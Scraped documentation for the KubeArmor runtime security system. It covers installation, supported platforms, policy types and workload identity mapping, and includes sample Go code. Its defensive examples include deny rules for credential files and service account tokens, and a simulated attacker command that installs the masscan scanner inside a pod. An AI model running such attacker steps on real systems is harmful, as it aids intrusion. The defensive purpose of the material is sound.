Only this pageAll pages
Powered by GitBook
1 of 37

KubeArmor

Loading...

Quick Links

Loading...

Loading...

Loading...

Loading...

Loading...

Loading...

Loading...

Loading...

Loading...

Loading...

Loading...

Loading...

Use-Cases

Loading...

Loading...

Loading...

Loading...

Loading...

Loading...

Loading...

Documentation

Loading...

Loading...

Loading...

Loading...

Loading...

Loading...

Loading...

Loading...

Loading...

Loading...

Contribution

Loading...

Loading...

Loading...

KubeArmor

KubeArmor is a cloud-native runtime security enforcement system that restricts the behavior (such as process execution, file access, and networking operations) of pods, containers, and nodes (VMs) at the system level.





Architecture Overview

Biweekly Meeting

CNCF

ROADMAP

Wiki

KubeArmor is a runtime security enforcement system for containers and nodes. It uses security policies (defined as Kubernetes Custom Resources like KSP, HSP, and CSP) to define allowed, audited, or blocked actions for workloads. The system monitors system activity using kernel technologies such as eBPF and enforces the defined policies by integrating with the underlying operating system's security modules like AppArmor, SELinux, or BPF-LSM, sending security alerts and telemetry through a log feeder.

Visual Overview

KubeArmor leverages such as , , or to enforce the user-specified policies. KubeArmor generates rich alerts/telemetry events with container/pod/namespace identities by leveraging eBPF.

Protect critical paths such as cert bundles MITRE, STIGs, CIS based rules Restrict access to raw DB table

Process Whitelisting Network Whitelisting Control access to sensitive assets

Process execs, File System accesses Service binds, Ingress, Egress connections Sensitive system call profiling

Kubernetes Deployment Containerized Deployment VM/Bare-Metal Deployment

Documentation

Security Policy for Pods/Containers [] []

Cluster level security Policy for Pods/Containers [] []

Security Policy for Hosts/Nodes [] [] ...

Contributors

,

Minutes:

Calendar invite: ,

Notice/Credits

KubeArmor uses 's system call utility functions.

KubeArmor is of the Cloud Native Computing Foundation.

KubeArmor roadmap is tracked via

📓
👥
🤝
Linux security modules (LSMs)
AppArmor
SELinux
BPF-LSM
👉
Getting Started
🎯
Use Cases
✔️
KubeArmor Support Matrix
♟️
How is KubeArmor different?
📜
Spec
Examples
📜
Spec
Examples
📜
Spec
Examples
detailed documentation
📘
Contribution Guide
🧑‍💻
Development Guide
Testing Guide
✋
Join KubeArmor Slack
❓
FAQs
🗣️
Zoom Link
📄
Document
📆
Google Calendar
ICS file
Tracee
KubeArmor Projects
⛓️
📋
🛅
🚥
🚥
🎛️
🧬
🧭
🔬
☸️
🐋
💻
💪
Harden Infrastructure
💍
Least Permissive Access
🔭
Application Behavior
❄️
Deployment Models

VM/Bare-Metal Deployment

This recipe explains how to use KubeArmor directly on a VM/Bare-Metal machine, and we tested the following steps on Ubuntu hosts.

The recipe installs kubearmor as systemd process and karmor cli tool to manage policies and show alerts/telemetry.

Download and Install KubeArmor

  1. Install KubeArmor (VER is the kubearmor release version)

sudo apt --no-install-recommends install ./kubearmor_${VER}_linux-amd64.deb

Note that the above command doesn't installs the recommended packages, as we ship object files along with the package file. In case you don't have BTF, consider removing --no-install-recommends flag.

Start KubeArmor

sudo systemctl start kubearmor

Check the status of KubeArmor using sudo systemctl status kubearmor or use sudo journalctl -u kubearmor -f to continuously monitor kubearmor logs.

Apply sample policy

Following policy is to deny execution of sleep binary on the host:

apiVersion: security.kubearmor.com/v1
kind: KubeArmorHostPolicy
metadata:
  name: hsp-kubearmor-dev-proc-path-block
spec:
  nodeSelector:
    matchLabels:
      kubearmor.io/hostname: "*" # Apply to all hosts
  process:
    matchPaths:
    - path: /usr/bin/sleep # try sleep 1
  action:
    Block

Save the above policy to hostpolicy.yaml and apply:

karmor vm policy add hostpolicy.yaml

Now if you run sleep command, the process would be denied execution.

Note that sleep may not be blocked if you run it in the same terminal where you apply the above policy. In that case, please open a new terminal and run sleep again to see if the command is blocked.

Get Alerts for policies and telemetry

karmor logs --gRPC=:32767 --json
{
"Timestamp":1717259989,
"UpdatedTime":"2024-06-01T16:39:49.360067Z",
"HostName":"kubearmor-dev",
"HostPPID":1582,
"HostPID":2420,
"PPID":1582,
"PID":2420,
"UID":1000,
"ParentProcessName":"/usr/bin/bash",
"ProcessName":"/usr/bin/sleep",
"PolicyName":"hsp-kubearmor-dev-proc-path-block",
"Severity":"1",
"Type":"MatchedHostPolicy",
"Source":"/usr/bin/bash",
"Operation":"Process",
"Resource":"/usr/bin/sleep",
"Data":"lsm=SECURITY_BPRM_CHECK",
"Enforcer":"BPFLSM",
"Action":"Block",
"Result":"Permission denied",
"Cwd":"/"
}

Support Matrix

KubeArmor supports following types of workloads:

Kubernetes Support Matrix

Supported Linux Distributions

Following distributions are tested for VM/Bare-metal based installations:

Note Full: Supports both enforcement and observability Partial: Supports only observability

Platform I am interested is not listed here! What can I do?

It would be very much appreciated if you can test kubearmor on a platform not listed above and if you have access to. Once tested you can update this document and raise a PR.

Sandbox Project

Download the or KubeArmor.

For distributions other than Ubuntu/Debian
  1. Refer to install pre-requisites.

  2. Download release tarball from KubeArmor releases for the version you want

wget https://github.com/KubeArmor/KubeArmor/releases/download/v${VER}/kubearmor_${VER}_linux-amd64.tar.gz
  1. Unpack the tarball to the root directory:

sudo tar --no-overwrite-dir -C / -xzf kubearmor_${VER}_linux-amd64.tar.gz
sudo systemctl daemon-reload

K8s orchestrated: Workloads deployed as k8s orchestrated containers. In this case, Kubearmor is deployed as a . Note, KubeArmor supports policy enforcement on both k8s-pods () as well as k8s-nodes ().

Containerized: Workloads that are containerized but not k8s orchestrated are supported. KubeArmor installed in can be used to protect such workloads.

VM/Bare-Metals: Workloads deployed on Virtual Machines or Bare Metal i.e. workloads directly operating as host/system processes. In this case, Kubearmor is deployed in .

Provider
Distro
VM / Bare-metal
Kubernetes

Please approach the Kubearmor community on or a GitHub issue to express interest in adding the support.

latest release
Installing BCC
k8s daemonset
KubeArmorPolicy
KubeArmorHostPolicy
systemd mode
systemd mode
slack
raise

Provider

K8s engine

OS Image

Arch

Audit Rules

Blocking Rules

LSM Enforcer

Remarks

Onprem

x86_64, ARM

Google

x86_64

Google

Ubuntu >= 16.04

x86_64

Microsoft

Ubuntu >= 18.04

x86_64

Oracle

x86_64

IBM

Ubuntu

x86_64

Talos

Talos

x86_64

AWS

Amazon Linux 2 (kernel >=5.8)

x86_64

AWS

Ubuntu

x86_64

AppArmor

AWS

x86_64

AWS

x86_64

AWS

Ubuntu

ARM

AppArmor

AWS

Amazon Linux 2

ARM

SELinux

RedHat

x86_64

SELinux

RedHat

x86_64

RedHat

x86_64

Rancher

x86_64

Rancher

x86_64

Oracle

ARM

SELinux

VMware

TBD

x86_64

Mirantis

Ubuntu>=20.04

x86_64

AppArmor

Digital Ocean

Debian GNU/Linux 11 (bullseye)

x86_64

Alibaba Cloud

Alibaba Cloud Linux 3.2104 LTS

x86_64

SUSE

SUSE Enterprise 15

Full

Full

Debian

Full

Full

Ubuntu

18.04 / 16.04 / 20.04

Full

Full

RedHat / CentOS

RHEL / CentOS <= 8.4

Full

Partial

RedHat / CentOS

RHEL / CentOS >= 8.5

Full

Full

Fedora

Fedora 34 / 35

Full

Full

Rocky Linux

Rocky Linux >= 8.5

Full

Full

AWS

Amazon Linux 2022

Full

Full

AWS

Amazon Linux 2023

Full

Full

RaspberryPi (ARM)

Debian

Full

Full

ArchLinux

ArchLinux-6.2.1

Full

Full

Alibaba

Alibaba Cloud Linux 3.2104 LTS 64 bit

Full

Full

Security Policies (KSP, HSP, CSP)

Welcome to the KubeArmor tutorial! In this first chapter, we'll dive into one of the most fundamental concepts in KubeArmor: Security Policies. Think of these policies as the instruction manuals or rulebooks you give to KubeArmor, telling it exactly how applications and system processes should behave.

What are Security Policies?

In any secure system, you need rules that define what is allowed and what isn't. In Kubernetes and Linux, these rules can get complicated, dealing with things like which files a program can access, which network connections it can make, or which powerful system features (capabilities) it's allowed to use.

KubeArmor simplifies this by letting you define these rules using clear, easy-to-understand Security Policies. You write these policies in a standard format that Kubernetes understands (YAML files, using something called Custom Resource Definitions or CRDs), and KubeArmor takes care of translating them into the low-level security configurations needed by the underlying system.

These policies are powerful because they allow you to specify security rules for different parts of your system:

  1. KubeArmorPolicy (KSP): For individual Containers or Pods running in your Kubernetes cluster.

  2. KubeArmorHostPolicy (HSP): For the Nodes (the underlying Linux servers) where your containers are running. This is useful for protecting the host system itself, or even applications running directly on the node outside of Kubernetes.

  3. KubeArmorClusterPolicy (CSP): For applying policies across multiple Containers/Pods based on namespaces or labels cluster-wide.

Why Do We Need Security Policies?

Imagine you have a web server application running in a container. This application should only serve web pages and access its configuration files. It shouldn't be trying to access sensitive system files like /etc/shadow or connecting to unusual network addresses.

Without security policies, if your web server container gets compromised, an attacker might use it to access or modify sensitive data, or even try to attack other parts of your cluster or network.

KubeArmor policies help prevent this by enforcing the principle of least privilege. This means you only grant your applications and host processes the minimum permissions they need to function correctly.

Use Case Example: Let's say you have a simple application container that should never be allowed to read the /etc/passwd file inside the container. We can use a KubeArmor Policy (KSP) to enforce this rule.

Anatomy of a KubeArmor Policy

KubeArmor policies are defined as YAML files that follow a specific structure. This structure includes:

  1. Metadata: Basic information about the policy, like its name. For KSPs, you also specify the namespace it belongs to. HSPs and CSPs are cluster-scoped, meaning they don't belong to a specific namespace.

  2. Selector: This is how you tell KubeArmor which containers, pods, or nodes the policy should apply to. You typically use Kubernetes labels for this.

  3. Spec (Specification): This is the core of the policy where you define the actual security rules (what actions are restricted) and the desired outcome (Allow, Audit, or Block).

Let's look at a simplified structure:

apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy # or KubeArmorHostPolicy, KubeArmorClusterPolicy
metadata:
  name: block-etc-passwd-read
  namespace: default # Only for KSP
spec:
  selector:
    # How to select the targets (pods for KSP, nodes for HSP, namespaces/labels for CSP)
    matchLabels:
      app: my-web-app # Apply this policy to pods with label app=my-web-app
  file: # Or 'process', 'network', 'capabilities', 'syscalls'
    matchPaths:
      - path: /etc/passwd
  action: Block # What to do if the rule is violated

Explanation:

  • apiVersion and kind: Identify this document as a KubeArmor Policy object.

  • metadata: Gives the policy a name (block-etc-passwd-read) and specifies the namespace (default) it lives in (for KSP).

  • spec: Contains the security rules.

  • selector: Uses matchLabels to say "apply this policy to any Pod in the default namespace that has the label app: my-web-app".

  • file: This section defines rules related to file access.

  • matchPaths: We want to match a specific file path.

  • - path: /etc/passwd: The specific file we are interested in.

  • action: Block: If any process inside the selected containers tries to access /etc/passwd, the action should be to Block that attempt.

This simple policy directly addresses our use case: preventing the web server (app: my-web-app) from reading /etc/passwd.

Policy Types in Detail

Let's break down the three types:

Policy Type
Abbreviation
Scope
Selector Type(s)

KubeArmorPolicy

KSP

Containers / Pods (Scoped by Namespace)

matchLabels, matchExpressions

KubeArmorHostPolicy

HSP

Nodes / Host OS

nodeSelector (matchLabels)

KubeArmorClusterPolicy

CSP

Containers / Pods (Cluster-wide)

selector (matchExpressions on namespace or label)

KubeArmorPolicy (KSP)

  • Applies to pods within a specific Kubernetes namespace.

  • Uses selector.matchLabels or selector.matchExpressions to pick which pods the policy applies to, based on their labels.

  • Example: Block /bin/bash execution in all pods within the dev namespace labeled role=frontend.

KubeArmorHostPolicy (HSP)

  • Applies to the host operating system of the nodes in your cluster.

  • Uses nodeSelector.matchLabels to pick which nodes the policy applies to, based on node labels.

  • Example: Prevent the /usr/bin/ssh process on nodes labeled node-role.kubernetes.io/worker from accessing /etc/shadow.

KubeArmorClusterPolicy (CSP)

  • Applies to pods across multiple namespaces or even the entire cluster.

  • Uses selector.matchExpressions which can target namespaces (key: namespace) or labels (key: label) cluster-wide.

  • Example: Audit all network connections made by pods in the default or staging namespaces. Or, block /usr/bin/curl execution in all pods across the cluster except those labeled app=allowed-tools.

These policies become Kubernetes Custom Resources when KubeArmor is installed. You can see their definitions in the KubeArmor source code under the deployments/CRD directory:

How KubeArmor Uses Policies (Under the Hood)

You've written a policy YAML file. What happens when you apply it to your Kubernetes cluster using kubectl apply -f your-policy.yaml?

  1. Policy Creation: You create the policy object in the Kubernetes API Server.

  2. KubeArmor Watches: The KubeArmor DaemonSet (a component running on each node) is constantly watching the Kubernetes API Server for KubeArmor policy objects (KSP, HSP, CSP).

  3. Policy Discovery: KubeArmor finds your new policy.

  4. Target Identification: KubeArmor evaluates the policy's selector (or nodeSelector) to figure out exactly which pods/containers or nodes this policy applies to.

  5. Translation: For each targeted container or node, KubeArmor translates the high-level rules defined in the policy's spec (like "Block access to /etc/passwd") into configurations for the underlying security enforcer (which could be AppArmor, SELinux, or BPF, depending on your setup and KubeArmor's configuration - we'll talk more about these later).

  6. Enforcement: The security enforcer on that specific node is updated with the new low-level rules. Now, if a targeted process tries to do something forbidden by the policy, the enforcer steps in to Allow, Audit, or Block the action as specified.

Here's a simplified sequence:

This flow shows how KubeArmor acts as the bridge between your easy-to-write YAML policies and the complex, low-level security mechanisms of the operating system.

Policy Actions: Allow, Audit, Block

Every rule in a KubeArmor policy (within the spec section) specifies an action. This tells KubeArmor what to do if the rule's condition is met.

  • Allow: Explicitly permits the action. This is useful for creating "whitelist" policies where you only allow specific behaviors and implicitly block everything else.

  • Audit: Does not prevent the action but generates a security alert or log message when it happens. This is great for testing policies before enforcing them or for monitoring potentially suspicious activity without disrupting applications.

  • Block: Prevents the action from happening and generates a security alert. This is for enforcing strict "blacklist" rules where you explicitly forbid certain dangerous behaviors.

Remember the "Note" mentioned in the provided policy specifications: For system call monitoring (syscalls), KubeArmor currently only supports the Audit action, regardless of what is specified in the policy YAML.

Conclusion

In this chapter, you learned that KubeArmor Security Policies (KSP, HSP, CSP) are your rulebooks for defining security posture in your Kubernetes environment. You saw how they use Kubernetes concepts like labels and namespaces to target specific containers, pods, or nodes. You also got a peek at the basic structure of these policies, including the selector for targeting and the spec for defining rules and actions.

Understanding policies is the first step to using KubeArmor effectively to protect your workloads and infrastructure. In the next chapter, we'll explore how KubeArmor identifies the containers and nodes it is protecting, which is crucial for the policy engine to work correctly.

Container/Node Identity

Welcome back to the KubeArmor tutorial! In the previous chapter, we learned about KubeArmor's Security Policies (KSP, HSP, CSP) and how they define rules for what applications and processes are allowed or forbidden to do. We saw that these policies use selectors (like labels and namespaces) to tell KubeArmor which containers, pods, or nodes they should apply to.

But how does KubeArmor know which policy to apply when something actually happens, like a process trying to access a file? When an event occurs deep within the operating system (like a process accessing /etc/shadow), the system doesn't just say "a pod with label app=my-web-app did this". It provides low-level details like Process IDs (PID), Parent Process IDs (PPID), and Namespace IDs (like PID Namespace and Mount Namespace).

This is where the concept of Container/Node Identity comes in.

What is Container/Node Identity?

Think of Container/Node Identity as KubeArmor's way of answering the question: "Who is doing this?".

When a system event happens on a node – maybe a process starts, a file is opened, or a network connection is attempted – KubeArmor intercepts this event. The event data includes technical details about the process that triggered it. KubeArmor needs to take these technical details and figure out if the process belongs to:

  1. A specific Container (which might be part of a Kubernetes Pod or a standalone Docker container).

  2. Or, the Node itself (the underlying Linux operating system, potentially running processes outside of containers).

Once KubeArmor knows who is performing the action (the specific container or node), it can then look up the relevant security policies that apply to that identity and decide whether to allow, audit, or block the action.

Why is Identity Important? A Simple Use Case

Imagine you have a KubeArmorPolicy (KSP) that says: "Block any attempt by containers with the label app: sensitive-data to read the file /sensitive/config.":

Now, suppose a process inside one of your containers tries to open /sensitive/config.

  • Without Identity: KubeArmor might see an event like "Process with PID 1234 and Mount Namespace ID 5678 tried to read /sensitive/config". Without knowing which container PID 1234 and MNT NS 5678 belong to, KubeArmor can't tell if this process is running in a container labeled app: sensitive-data. It wouldn't know which policy applies!

  • With Identity: KubeArmor sees the event, looks up PID 1234 and MNT NS 5678 in its internal identity map, and discovers "Ah, that PID and Namespace belong to Container ID abc123def456... which is part of Pod my-sensitive-pod-xyz in namespace default, and that pod has the label app: sensitive-data." Now it knows this event originated from a workload targeted by the block-sensitive-file-read policy. It can then apply the Block action.

So, identifying the workload responsible for a system event is fundamental to enforcing policies correctly.

How KubeArmor Identifies Workloads

KubeArmor runs as a DaemonSet on each node in your Kubernetes cluster (or directly on a standalone Linux server). This daemon is responsible for monitoring system activity on that specific node. To connect these low-level events to higher-level workload identities (like Pods or Nodes), KubeArmor does a few things:

  1. Watching Kubernetes (for K8s environments): The KubeArmor daemon watches the Kubernetes API Server for events related to Pods and Nodes. When a new Pod starts, KubeArmor gets its details:

    • Pod Name

    • Namespace Name

    • Labels (this is key for policy selectors!)

    • Container details (Container IDs, Image names)

    • Node Name where the Pod is scheduled. KubeArmor stores this information.

  2. Interacting with Container Runtimes: KubeArmor talks to the container runtime (like Docker or containerd) running on the node. It uses the Container ID (obtained from Kubernetes or by watching runtime events) to get more low-level details:

    • Container PID (the process ID of the main process inside the container as seen from the host OS).

    • Container Namespace IDs (specifically the PID Namespace ID and Mount Namespace ID). These IDs are crucial because system events are often reported with these namespace identifiers.

  3. Monitoring Host Processes: KubeArmor also monitors processes running directly on the host node (outside of containers).

KubeArmor builds and maintains an internal map that links these low-level identifiers (like PID Namespace ID + Mount Namespace ID) to the corresponding higher-level identities (Container ID, Pod Name, Namespace, Node Name, Labels).

Let's visualize how this identity mapping happens and is used:

This diagram shows the two main phases:

  1. Identity Discovery: KubeArmor actively gathers information from Kubernetes and the container runtime to build its understanding of which system identifiers belong to which workloads.

  2. Event Correlation: When a system event occurs, KubeArmor uses the identifiers from the event (like Namespace IDs) to quickly look up the corresponding workload identity in its map.

Looking at the Code (Simplified)

The KubeArmor code interacts with Kubernetes and Docker/containerd to get this identity information.

For Kubernetes environments, KubeArmor's k8sHandler watches for Pod and Node events:

This snippet shows that KubeArmor isn't passively waiting; it actively watches the Kubernetes API for changes using standard Kubernetes watch mechanisms. When a Pod is added, updated, or deleted, KubeArmor receives an event and updates its internal state.

For Docker (and similar logic exists for containerd), KubeArmor's dockerHandler can inspect running containers to get detailed information:

This function is critical. It takes a containerID and retrieves its associated Namespace IDs (PidNS, MntNS) by reading special files in the /proc filesystem on the host, which link the host PID to the namespaces it belongs to. It also retrieves labels and other useful information directly from the container runtime's inspection data.

This collected identity information is stored internally. For example, the SystemMonitor component maintains a map (NsMap) to quickly look up a workload based on Namespace IDs:

These functions from processTree.go show how KubeArmor builds and uses the core identity mapping: it stores the relationship between Namespace IDs (found in system events) and the Container ID, allowing it to quickly identify which container generated an event.

Identity Types Summary

KubeArmor primarily identifies workloads using the following:

This allows KubeArmor to apply the correct security policies, whether they are KSPs (targeting Containers/Pods based on labels/namespaces) or HSPs (targeting Nodes based on node labels).

Conclusion

Understanding Container/Node Identity is key to grasping how KubeArmor works. It's the crucial step where KubeArmor translates low-level system events into the context of your application workloads (containers in pods) or your infrastructure (nodes). By maintaining a map of system identifiers to workload identities, KubeArmor can accurately determine which policies apply to a given event and enforce your desired security posture.

In the next chapter, we'll look at the component that takes this identified event and the relevant policy and makes the decision to allow, audit, or block the action.

Differentiation

Significance of Inline Mitigation

KubeArmor supports attack prevention, not just observability and monitoring. More importantly, the prevention is handled inline: even before a process is spawned, a rule can deny execution of a process. Most other systems typically employ "post-attack mitigation" that kills a process/pod after malicious intent is observed, allowing an attacker to execute code on the target environment. Essentially KubeArmor uses inline mitigation to reduce the attack surface of a pod/container/VM. KubeArmor leverages best of breed Linux Security Modules (LSMs) such as AppArmor, BPF-LSM, and SELinux (only for host protection) for inline mitigation. LSMs have several advantages over other techniques:

  • KubeArmor does not change anything with the pod/container.

  • KubeArmor does not require any changes at the host level or at the CRI (Container Runtime Interface) level to enforce blocking rules. KubeArmor deploys as a non-privileged DaemonSet with certain capabilities that allows it to monitor other pods/containers and the host.

  • A given cluster can have multiple nodes utilizing different LSMs. KubeArmor abstracts away complexities of LSMs and provides an easy way to enforce policies. KubeArmor manages complexity of LSMs under-the-hood.

Post-Attack Mitigation and its flaws

  • Post-exploit Mitigation works by killing a suspicious process in response to an alert indicating malicious intent.

  • Attacker is allowed to execute a binary. Attacker could disable security controls, access logs, etc to circumvent attack detection.

  • By the time a malicious process is killed, sensitive contents could have already been deleted, encrypted, or transmitted.

Problems with k8s native Pod Security Context

This approach has multiple problems:

  1. It is often difficult to predict which LSM (AppArmor or SELinux) would be available on the target node.

  2. BPF-LSM is not supported by Pod Security Context.

  3. It is difficult to manually specify an AppArmor or SELinux policy. Changing default AppArmor or SELinux policies might result in more security holes since it is difficult to decipher the implications of the changes and can be counter-productive.

Problems with multi-cloud deployment

Different managed cloud providers use different default distributions. Google GKE COS uses AppArmor by default, AWS Bottlerocket uses BPF-LSM and SELinux, and AWS Amazon Linux 2 uses only SELinux by default. Thus it is challenging to use Pod Security Context in multi-cloud deployments.

Use of BPF-LSM

References:

Getting Started

Install KubeArmor

Install kArmor CLI (Optional)

Deploy test nginx app

[!NOTE]$POD is used to refer to the target nginx pod in many cases below.

Sample policies

Deny execution of package management tools (apt/apt-get)

Package management tools can be used in the runtime env to download new binaries that will increase the attack surface of the pods. Attackers use package management tools to download accessory tooling (such as masscan) to further their cause. It is better to block usage of package management tools in production environments.

Lets apply the policy to block such execution:

Now execute the apt command to download the masscan tool.

It will be denied permission to execute.

Get policy violations notifications using kArmor CLI
Deny access to service account token

K8s mounts the service account token by default in each pod even if there is no app using it. Attackers use these service account tokens to do lateral movements.

For e.g., to access service account token:

Thus we can see that one can use the service account token to access the Kube API server.

Lets apply a policy to block access to service account token:

Now when anyone tries to access to service account token, it would be Permission Denied.

Audit access to folders/paths

Access to certain folders/paths might have to be audited for compliance/reporting reasons.

File Visibility is disabled by default to minimize telemetry. Some file based policies will need that enabled. To enable file visibility on a namespace level:

For more details on this: https://docs.kubearmor.io/kubearmor/documentation/kubearmor_visibility#updating-namespace-visibility

Lets audit access to /etc/nginx/ folder within the deployment.

Note: karmor logs -n default would show all the audit/block operations.

Zero Trust Least Permissive Policy: Allow only nginx to execute in the pod, deny rest

Least permissive policies require one to allow certain actions/operations and deny rest. With KubeArmor it is possible to specify as part of the policy as to what actions should be allowed and deny/audit the rest.

By default the security posture is set to audit. Lets change the security posture to default deny.

Observe that the policy contains Allow action. Once there is any KubeArmor policy having Allow action then the pods enter least permissive mode, allowing only explicitly allowed operations.

Note: Use kubectl port-forward $POD --address 0.0.0.0 8080:80 to access nginx and you can see that the nginx web access still works normally.

Lets try to execute some other processes:

Any binary other than bash and nginx would be permission denied.

kubeadm, , , microk8s

, AppArmor

, AppArmor

All

, AppArmor

All

, AppArmor

>=7

, AppArmor

<=8.4

>=8.5

>=9.2

, AppArmor

, AppArmor

/

(KSP)

(HSP)

(CSP)

And their corresponding Go type definitions are in . You don't need to understand Go or CRD internals right now, just know that these files formally define the structure and rules for creating KubeArmor policies that Kubernetes understands.

Workload Type
Key Identifiers Monitored/Used
Source of Information

, “post-exploitation detection/mitigation is at the mercy of an exploit writer putting little to no effort into avoiding tripping these detection mechanisms.”

allows one to specify or policies.

This guide assumes you have access to a . If you want to try non-k8s mode, for instance systemd mode to protect/audit containers or processes on VMs/bare-metal, check .

Check the to verify if your platform is supported.

You can find more details about helm related values and configurations .

[!NOTE] kArmor CLI provides a Developer Friendly way to interact with KubeArmor Telemetry. You can stream KubeArmor telemetry independently of kArmor CLI tool and integrate it with your chosen SIEM (Security Information and Event Management) solutions. on how to achieve this integration. This guide assumes you have kArmor CLI to access KubeArmor Telemetry but you can view it on your SIEM tool once integrated.

If you don't see Permission denied please refer to debug this issue

If you don't see Permission denied please refer to debug this issue.

defines what happens to the operations that are not in the allowed list. Should it be audited (allow but alert), or denied (block and alert)?

If you don't see Permission denied please refer to debug this issue

✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
❌
✔️
✔️
✔️
❌
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
❌
✔️
🚧
🚧
🚧
🚧
🚧
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
✔️
Observability
Network-Segmentation
k0s
k3s
BPFLSM
GKE
COS
BPFLSM
release channels
GKE
BPFLSM
release channels
AKS
BPFLSM
OKE
UEK
BPFLSM
Oracle Linux Server 8.7
IKS
BPFLSM
Talos k8s
BPFLSM
1540
EKS
BPFLSM
EKS
EKS
Bottlerocket
BPFLSM
EKS-Auto-Mode
Bottlerocket
BPFLSM
Graviton
Graviton
OpenShift
RHEL
OpenShift
RHEL
BPFLSM
MicroShift
RHEL
BPFLSM
RKE
SUSE
BPFLSM
K3S
BPFLSM
Ampere
UEK
1084
Tanzu
1064
MKE
1181
DOKS
BPFLSM
1120
Alibaba
BPFLSM
1650
Buster
Bullseye
KubeArmorPolicy CRD
KubeArmorHostPolicy CRD
KubeArmorClusterPolicy CRD
types/types.go
Distros
Distros
# simplified KSP
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: block-sensitive-file-read
  namespace: default
spec:
  selector:
    matchLabels:
      app: sensitive-data # Policy applies to containers/pods with this label
  file:
    matchPaths:
      - path: /sensitive/config # Specific file to protect
        readOnly: true # Protect against writes too, but let's focus on read
  action: Block # If read is attempted, block it
// KubeArmor/core/k8sHandler.go (Simplified)

// WatchK8sPods Function
func (kh *K8sHandler) WatchK8sPods(nodeName string) *http.Response {
	// ... code to build API request URL ...
	// The URL includes '?watch=true' to get a stream of events
	URL := "https://" + kh.K8sHost + ":" + kh.K8sPort + "/api/v1/pods?watch=true"

	// ... code to make HTTP request to K8s API server ...
	// Returns a response stream where KubeArmor reads events
	resp, err := kh.WatchClient.Do(req)
	if err != nil {
		return nil // Handle error
	}
	return resp
}

// ... similar functions exist to watch Nodes and Policies ...
// KubeArmor/core/dockerHandler.go (Simplified)

// GetContainerInfo Function
func (dh *DockerHandler) GetContainerInfo(containerID string, OwnerInfo map[string]tp.PodOwner) (tp.Container, error) {
	if dh.DockerClient == nil {
		return tp.Container{}, errors.New("no docker client")
	}

	// Ask the Docker daemon for details about a specific container ID
	inspect, err := dh.DockerClient.ContainerInspect(context.Background(), containerID)
	if err != nil {
		return tp.Container{}, err // Handle error
	}

	container := tp.Container{}
	container.ContainerID = inspect.ID
	container.ContainerName = strings.TrimLeft(inspect.Name, "/")

	// Get Kubernetes specific labels if available (e.g., for Pod name, namespace)
	containerLabels := inspect.Config.Labels
	if val, ok := containerLabels["io.kubernetes.pod.namespace"]; ok {
		container.NamespaceName = val
	}
	if val, ok := containerLabels["io.kubernetes.pod.name"]; ok {
		container.EndPointName = val // In KubeArmor types, EndPoint often refers to a Pod or standalone Container
	}
    // ... get other details like image, apparmor profile, privileged status ...

	// Get the *host* PID of the container's main process
	pid := strconv.Itoa(inspect.State.Pid)

	// Read /proc/<host-pid>/ns/pid and /proc/<host-pid>/ns/mnt to get Namespace IDs
	if data, err := os.Readlink(filepath.Join(cfg.GlobalCfg.ProcFsMount, pid, "/ns/pid")); err == nil {
		fmt.Sscanf(data, "pid:[%d]\n", &container.PidNS)
	}
	if data, err := os.Readlink(filepath.Join(cfg.GlobalCfg.ProcFsMount, pid, "/ns/mnt")); err == nil {
		fmt.Sscanf(data, "mnt:[%d]\n", &container.MntNS)
	}

    // ... store labels, etc. ...

	return container, nil
}
// KubeArmor/monitor/processTree.go (Simplified)

// NsKey Structure (used as map key)
type NsKey struct {
	PidNS uint32
	MntNS uint32
}

// LookupContainerID Function
// This function is used when an event comes in with PidNS and MntNS
func (mon *SystemMonitor) LookupContainerID(pidns, mntns uint32) string {
	key := NsKey{PidNS: pidns, MntNS: mntns}

	mon.NsMapLock.RLock() // Use read lock for looking up
	defer mon.NsMapLock.RUnlock()

	if val, ok := mon.NsMap[key]; ok {
		// If the key (Namespace IDs) is in the map, return the ContainerID
		return val
	}

	// Return empty string if not found (might be a host process)
	return ""
}

// AddContainerIDToNsMap Function
// This function is called when KubeArmor discovers a new container
func (mon *SystemMonitor) AddContainerIDToNsMap(containerID string, namespace string, pidns, mntns uint32) {
	key := NsKey{PidNS: pidns, MntNS: mntns}

	mon.NsMapLock.Lock() // Use write lock for modifying the map
	defer mon.NsMapLock.Unlock()

	// Store the mapping: Namespace IDs -> Container ID
	mon.NsMap[key] = containerID

    // ... also updates other maps related to namespaces and policies ...
}

Container

Container ID, PID Namespace ID, Mount Namespace ID, Pod Name, Namespace, Labels

Kubernetes API, Container Runtime

Node

Node Name, Node Labels, Operating System Info

Kubernetes API, Host OS APIs

helm repo add kubearmor https://kubearmor.github.io/charts
helm repo update kubearmor
helm upgrade --install kubearmor-operator kubearmor/kubearmor-operator -n kubearmor --create-namespace
kubectl apply -f https://raw.githubusercontent.com/kubearmor/KubeArmor/main/pkg/KubeArmorOperator/config/samples/sample-config.yml
curl -sfL http://get.kubearmor.io/ | sudo sh -s -- -b /usr/local/bin
# sudo access is needed to install it in /usr/local/bin directory. But, if you prefer not to use sudo, you can install it in a different directory which is in your PATH.
kubectl create deployment nginx --image=nginx
POD=$(kubectl get pod -l app=nginx -o name)
cat <<EOF | kubectl apply -f -
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: block-pkg-mgmt-tools-exec
spec:
  selector:
    matchLabels:
      app: nginx
  process:
    matchPaths:
    - path: /usr/bin/apt
    - path: /usr/bin/apt-get
  action:
    Block
EOF
kubectl exec -it $POD -- bash -c "apt update && apt install masscan"
sh: 1: apt: Permission denied
command terminated with exit code 126
karmor logs -n default --json
{
  "Timestamp": 1686475183,
  "UpdatedTime": "2023-06-11T09:19:43.451704Z",
  "ClusterName": "default",
  "HostName": "ip-172-31-24-142",
  "NamespaceName": "default",
  "PodName": "nginx-8f458dc5b-fl42t",
  "Labels": "app=nginx",
  "ContainerID": "8762eafc25a35ab90089f79703b86659989e8e547c2c029fb60f55d884355000",
